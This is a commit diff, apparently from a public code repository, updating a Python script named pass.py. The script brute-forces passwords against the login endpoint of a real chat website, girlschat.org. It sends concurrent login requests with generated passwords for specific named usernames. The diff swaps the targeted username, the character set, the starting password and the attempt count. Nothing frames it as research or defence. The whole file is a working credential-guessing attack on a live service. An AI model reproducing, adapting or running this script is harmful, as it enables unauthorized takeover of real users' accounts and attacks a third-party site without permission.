asv7j commited on
Commit
8033f70
·
verified ·
1 Parent(s): b187060

Update pass.py

Browse files
Files changed (1) hide show
  1. pass.py +4 -4
pass.py CHANGED
@@ -3,7 +3,7 @@ import time
3
  from concurrent.futures import ThreadPoolExecutor, as_completed
4
 
5
  def send_login(username, number_of_attempts):
6
- charset = '912648'
7
  # Function to send login request
8
  def send_request(upass):
9
  response = requests.post('https://girlschat.org/chat/system/encoded/login.php', data={
@@ -30,7 +30,7 @@ def send_login(username, number_of_attempts):
30
  return charset[0] + current
31
 
32
  # Start password
33
- password = '846214'
34
  passwords = [password]
35
 
36
  for _ in range(number_of_attempts - 1):
@@ -43,8 +43,8 @@ def send_login(username, number_of_attempts):
43
  start = time.time()
44
 
45
  # Example usage
46
- username = 'WonderWolf' # Replace with actual username
47
- number_of_attempts = 2560 # Set the number of password attempts
48
  send_login(username, number_of_attempts)
49
  end = time.time()
50
  print(end - start)
 
3
  from concurrent.futures import ThreadPoolExecutor, as_completed
4
 
5
  def send_login(username, number_of_attempts):
6
+ charset = '24'
7
  # Function to send login request
8
  def send_request(upass):
9
  response = requests.post('https://girlschat.org/chat/system/encoded/login.php', data={
 
30
  return charset[0] + current
31
 
32
  # Start password
33
+ password = 'asdf123'
34
  passwords = [password]
35
 
36
  for _ in range(number_of_attempts - 1):
 
43
  start = time.time()
44
 
45
  # Example usage
46
+ username = 'NightNyx' # Replace with actual username
47
+ number_of_attempts = 64 # Set the number of password attempts
48
  send_login(username, number_of_attempts)
49
  end = time.time()
50
  print(end - start)